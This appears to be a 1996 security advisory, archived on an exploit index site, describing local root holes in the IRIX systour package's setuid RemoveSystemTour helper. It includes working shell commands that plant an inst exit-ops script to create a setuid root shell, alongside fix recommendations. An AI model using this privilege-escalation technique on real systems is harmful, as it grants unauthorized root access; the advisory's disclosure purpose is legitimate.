IRIX systour package security holes
|Description:||The "systour" packaged shipped with IRIX contains numerous security holes.|
|Compromise:|| root (local) |
|Vulnerable Systems:||At least Irix 5.3 and 6.2 with systour installed |
|Date:||30 October 1996 |
Date: Wed, 30 Oct 1996 15:15:30 -0500
Security vulnerability [SDN-5-sgi-systour] 30 October 1996
Desktop SGIs ship with a system tour pre-installed; it is the package
"systour". After the user runs through the tour, the option is given to
remove the tour from the hard disk. As the user does not have permission
to run "versions(1M) remove", SGI writes a short program, called
RemoveSystemTour, that is setuid and spawns a versions remove.
The problem is, of course, when a malicious user notices that the
tour is still lying around on the hard disk. Since "versions remove" is
merely a call to inst(1M), and inst is a very configurable program--
allowing the user to specify not only logfiles, directories, and exit
operation scripts, making a setuid call to inst must be done with greater
caution than now.
There are several ways to exploit RemoveSystemTour. Here I describe the
easiest, and later on I describe other problems and fixes.
AFFECTS. SGI IRIX 5.3 and 6.2 with the systour package available.
REQUIRED. account on server
RISK. root compromise, denial of service, etc.
First, we set up an environment for running inst. dryrun is set to true
because we are considerate environmentalists.
$ rbase=$HOME; export rbase
$ mkdir -p $HOME/var/inst
$ echo "dryrun: true" > $HOME/.swmgrrc
These three lines should be very familiar to all exploitors.
$ cp -p /bin/sh /tmp/foobar
$ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
$ chmod a+x $HOME/var/inst/.exitops
Now run it.
Executing outstanding exit-commands from previous session ..
Successfully completed exit-commands from previous session.
Reading installation history
ERROR : Software Manager: automatic installation failed: New target
(nothing installed) and no distribution.
DISCUSSION. The easiest solution is to replace RemoveSystemTour with
a binary that checks the password. However, RemoveSystemTour may not be
the only way to access inst, and so these general recommendations apply:
inst should check UID and lock configuration options when called non-
interactively from versions and with euid 0. inst also has a race
condition on the file /tmp/shPID0, the shell script it creates to make the
appropriate directory (rbase). inst should verify the variables it
uses--by relying on an external shell script, environment variables, IFS,
etc. can be tampered with. Finally, inst will happily overwrite logfiles
specified in the .swmgrrc file and creat() the shell script over anything.
TEMPORARY FIX. Either remove the system tour or chmod -s the
ADDITIONAL COMMENTS. None.
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: